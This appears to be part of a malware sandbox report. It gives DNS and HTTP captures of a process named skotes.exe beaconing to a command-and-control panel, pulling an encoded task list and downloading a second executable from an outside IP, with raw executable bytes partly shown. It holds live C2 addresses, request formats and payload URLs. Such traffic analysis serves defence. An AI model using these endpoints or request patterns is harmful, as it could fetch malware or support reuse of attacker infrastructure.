Dec 14, 2024 23:59:43.147090912 CET	1.1.1.1	192.168.2.4	0x1257	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 23:59:43.147090912 CET	1.1.1.1	192.168.2.4	0x1257	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 23:59:44.444633961 CET	1.1.1.1	192.168.2.4	0x95cf	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:44.577029943 CET	1.1.1.1	192.168.2.4	0xff68	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:44.577029943 CET	1.1.1.1	192.168.2.4	0xff68	No error (0)	plus.l.google.com		142.250.181.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:44.577716112 CET	1.1.1.1	192.168.2.4	0x8c82	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:44.585685015 CET	1.1.1.1	192.168.2.4	0x1b6b	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:44.726402044 CET	1.1.1.1	192.168.2.4	0xb566	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:44.867640018 CET	1.1.1.1	192.168.2.4	0x4c4b	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:45.008676052 CET	1.1.1.1	192.168.2.4	0xd337	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:45.159169912 CET	1.1.1.1	192.168.2.4	0x8e13	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:45.301995039 CET	1.1.1.1	192.168.2.4	0x17bb	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:45.707110882 CET	1.1.1.1	192.168.2.4	0x3537	No error (0)	play.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.830368996 CET	1.1.1.1	192.168.2.4	0x821d	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:47.830368996 CET	1.1.1.1	192.168.2.4	0x821d	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:47.830462933 CET	1.1.1.1	192.168.2.4	0x821d	No error (0)	a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com	a17.rackcdn.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:47.830462933 CET	1.1.1.1	192.168.2.4	0x821d	No error (0)	a17.rackcdn.com	a17.rackcdn.com.mdc.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	www.youtube.com	youtube-ui.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.865609884 CET	1.1.1.1	192.168.2.4	0x5abd	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.866511106 CET	1.1.1.1	192.168.2.4	0xd0de	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:47.866511106 CET	1.1.1.1	192.168.2.4	0xd0de	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:47.867259979 CET	1.1.1.1	192.168.2.4	0xc99c	No error (0)	www.wikipedia.org	dyna.wikimedia.org		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:47.867259979 CET	1.1.1.1	192.168.2.4	0xc99c	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		172.217.21.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		142.250.181.14	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006517887 CET	1.1.1.1	192.168.2.4	0x8591	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.006802082 CET	1.1.1.1	192.168.2.4	0x2ee0	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.009578943 CET	1.1.1.1	192.168.2.4	0x3867	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.147418022 CET	1.1.1.1	192.168.2.4	0x118f	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 23:59:48.147418022 CET	1.1.1.1	192.168.2.4	0x118f	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 23:59:48.147418022 CET	1.1.1.1	192.168.2.4	0x118f	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 23:59:48.147418022 CET	1.1.1.1	192.168.2.4	0x118f	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 23:59:48.148580074 CET	1.1.1.1	192.168.2.4	0xdf9b	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Dec 14, 2024 23:59:48.148828983 CET	1.1.1.1	192.168.2.4	0x62d0	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Dec 14, 2024 23:59:48.286007881 CET	1.1.1.1	192.168.2.4	0x4da3	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 23:59:48.286007881 CET	1.1.1.1	192.168.2.4	0x4da3	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.286007881 CET	1.1.1.1	192.168.2.4	0x4da3	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.286007881 CET	1.1.1.1	192.168.2.4	0x4da3	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.286007881 CET	1.1.1.1	192.168.2.4	0x4da3	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.287097931 CET	1.1.1.1	192.168.2.4	0x5c3f	No error (0)	twitter.com		104.244.42.129	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.425502062 CET	1.1.1.1	192.168.2.4	0x856c	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.425502062 CET	1.1.1.1	192.168.2.4	0x856c	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.425502062 CET	1.1.1.1	192.168.2.4	0x856c	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.425502062 CET	1.1.1.1	192.168.2.4	0x856c	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Dec 14, 2024 23:59:48.426531076 CET	1.1.1.1	192.168.2.4	0x2292	No error (0)	twitter.com		104.244.42.129	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:00:20.817435026 CET	1.1.1.1	192.168.2.4	0x83ec	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:01:03.436739922 CET	1.1.1.1	192.168.2.4	0x8b9	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 15, 2024 00:01:03.436739922 CET	1.1.1.1	192.168.2.4	0x8b9	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:01:56.973583937 CET	1.1.1.1	192.168.2.4	0xf832	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:01:58.453032970 CET	1.1.1.1	192.168.2.4	0x3592	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 15, 2024 00:01:58.453032970 CET	1.1.1.1	192.168.2.4	0x3592	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:02:23.740119934 CET	1.1.1.1	192.168.2.4	0x7984	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:02:23.878705025 CET	1.1.1.1	192.168.2.4	0xdb0d	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:55.004807949 CET	1.1.1.1	192.168.2.4	0x5475	No error (0)	tacitglibbr.biz		104.21.50.161	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:55.004807949 CET	1.1.1.1	192.168.2.4	0x5475	No error (0)	tacitglibbr.biz		172.67.164.37	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:57.407279968 CET	1.1.1.1	192.168.2.4	0xa047	No error (0)	immureprech.biz		172.67.207.38	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:57.407279968 CET	1.1.1.1	192.168.2.4	0xa047	No error (0)	immureprech.biz		104.21.22.222	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:59.537213087 CET	1.1.1.1	192.168.2.4	0xe96	No error (0)	deafeninggeh.biz		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:59.537213087 CET	1.1.1.1	192.168.2.4	0xe96	No error (0)	deafeninggeh.biz		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:59.537213087 CET	1.1.1.1	192.168.2.4	0xe96	No error (0)	deafeninggeh.biz		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:59.537213087 CET	1.1.1.1	192.168.2.4	0xe96	No error (0)	deafeninggeh.biz		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:59.537213087 CET	1.1.1.1	192.168.2.4	0xe96	No error (0)	deafeninggeh.biz		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:59.537213087 CET	1.1.1.1	192.168.2.4	0xe96	No error (0)	deafeninggeh.biz		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:03:59.537213087 CET	1.1.1.1	192.168.2.4	0xe96	No error (0)	deafeninggeh.biz		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:01.646033049 CET	1.1.1.1	192.168.2.4	0xe14a	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:01.792818069 CET	1.1.1.1	192.168.2.4	0xcdb8	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:01.934240103 CET	1.1.1.1	192.168.2.4	0xcda7	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:02.081012011 CET	1.1.1.1	192.168.2.4	0x3970	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:02.222870111 CET	1.1.1.1	192.168.2.4	0xeef7	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:02.373847008 CET	1.1.1.1	192.168.2.4	0xc68e	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:02.515767097 CET	1.1.1.1	192.168.2.4	0x1ff0	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:09.563916922 CET	1.1.1.1	192.168.2.4	0x77ba	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 15, 2024 00:04:09.563916922 CET	1.1.1.1	192.168.2.4	0x77ba	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.066390038 CET	1.1.1.1	192.168.2.4	0xa8a1	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.211913109 CET	1.1.1.1	192.168.2.4	0x67bf	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.357108116 CET	1.1.1.1	192.168.2.4	0xb9de	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.500272036 CET	1.1.1.1	192.168.2.4	0x5b1f	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.642451048 CET	1.1.1.1	192.168.2.4	0xaa88	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:17.784706116 CET	1.1.1.1	192.168.2.4	0xdd2f	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:51.587666035 CET	1.1.1.1	192.168.2.4	0xc626	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:51.730716944 CET	1.1.1.1	192.168.2.4	0x793a	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:51.870835066 CET	1.1.1.1	192.168.2.4	0x6969	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:52.013595104 CET	1.1.1.1	192.168.2.4	0x6b1d	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:52.155646086 CET	1.1.1.1	192.168.2.4	0xfdec	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:52.298693895 CET	1.1.1.1	192.168.2.4	0x60cf	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:04:52.444900990 CET	1.1.1.1	192.168.2.4	0x49d6	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:05:05.346498966 CET	1.1.1.1	192.168.2.4	0x590b	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:05:05.487258911 CET	1.1.1.1	192.168.2.4	0x345d	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:05:58.460230112 CET	1.1.1.1	192.168.2.4	0x8183	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:05:59.936538935 CET	1.1.1.1	192.168.2.4	0x5bc	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 15, 2024 00:05:59.936538935 CET	1.1.1.1	192.168.2.4	0x5bc	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:06:00.040343046 CET	1.1.1.1	192.168.2.4	0x5bc	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 15, 2024 00:06:00.040343046 CET	1.1.1.1	192.168.2.4	0x5bc	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49758	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:04.586390972 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 23:58:05.921753883 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49764	185.215.113.43	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:07.562462091 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 30 32 44 37 32 42 36 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB02D72B65982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 23:58:08.931937933 CET	1074	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 37 33 0d 0a 20 3c 63 3e 31 30 31 35 33 32 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 64 32 64 63 32 31 38 31 38 65 66 30 32 62 31 31 64 31 32 30 33 37 64 63 31 65 38 64 31 34 63 62 64 39 34 39 61 35 35 33 36 65 36 23 31 30 31 35 33 34 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 39 32 66 63 34 31 32 31 65 65 66 30 37 62 64 31 39 30 62 37 36 35 63 61 31 64 65 65 66 34 65 38 35 65 33 64 31 34 38 32 62 23 31 30 31 35 33 35 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 35 33 35 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 [TRUNCATED] Data Ascii: 373 <c>1015327001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9d2dc21818ef02b11d12037dc1e8d14cbd949a5536e6#1015343001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb992fc4121eef07bd190b765ca1deef4e85e3d1482b#1015352001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1015353001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1015354001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1015355001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1015356001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1015357001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1015358001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e100b7#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49770	31.41.244.11	80	6720	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:09.056471109 CET	66	OUT	GET /files/6209411516/H9TU4oY.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 23:58:10.385174990 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 22:58:10 GMT Content-Type: application/octet-stream Content-Length: 1834496 Last-Modified: Sat, 14 Dec 2024 21:12:38 GMT Connection: keep-alive ETag: "675df4c6-1bfe00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b0 00 00 00 00 00 00 00 80 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 48 00 00 04 00 00 e2 b0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbYgH@H@T0h 1 H@.rsrc X@.idata 0Z@ )@\@ubvmxkob.z^@xdawalmhpH@.taggant0H"@
Dec 14, 2024 23:58:10.385348082 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:10.385386944 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:10.385741949 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 23:58:10.385791063 CET	1236	IN	Data Raw: 2b 56 60 82 81 22 3e dd c0 b7 04 63 08 21 00 f4 9c ff c3 13 76 a1 57 87 16 14 c0 c8 58 a0 8b a1 cf 21 63 04 a6 13 99 8b 24 95 43 7b 74 59 3a ec e3 5a 7a 4a 68 62 3f 34 e8 29 a6 cb 9a 2d ac 07 3e 47 cc 46 4e 9c da 4e fc 9a 7f 58 f5 5c 3f 0b f7 9a Data Ascii: +V`">c!vWX!c$C{tY:ZzJhb?4)->GFNNX\?@>-]?\|2Fo\|_{)?x\(kKwmzu>T4?/].tnEvT9M$mBJzY_7n4Zn=G-;p
Dec 14, 2024 23:58:10.385828018 CET	1120	IN	Data Raw: b2 ba 96 13 c8 35 83 4a 7a b1 fb 46 c4 fc bf 84 d4 b7 ca 52 bc 15 5f 72 87 e1 0b ae 8a 8b d5 44 e4 d9 1a 59 97 1f 09 a9 c4 85 67 43 fe 29 00 ef d6 c1 41 12 4d b1 4c 12 05 29 ed 08 dc 52 02 93 77 4d 27 46 74 24 eb 3a 19 ba 89 60 b8 a8 89 64 8e b6 Data Ascii: 5JzFR_rDYgC)AML)RwM'Ft$:`dz4O#N2M(lT[TO'!!w5*=V! "ZxE4O(8YTR2-JAUA?>{0xO=L&>I2
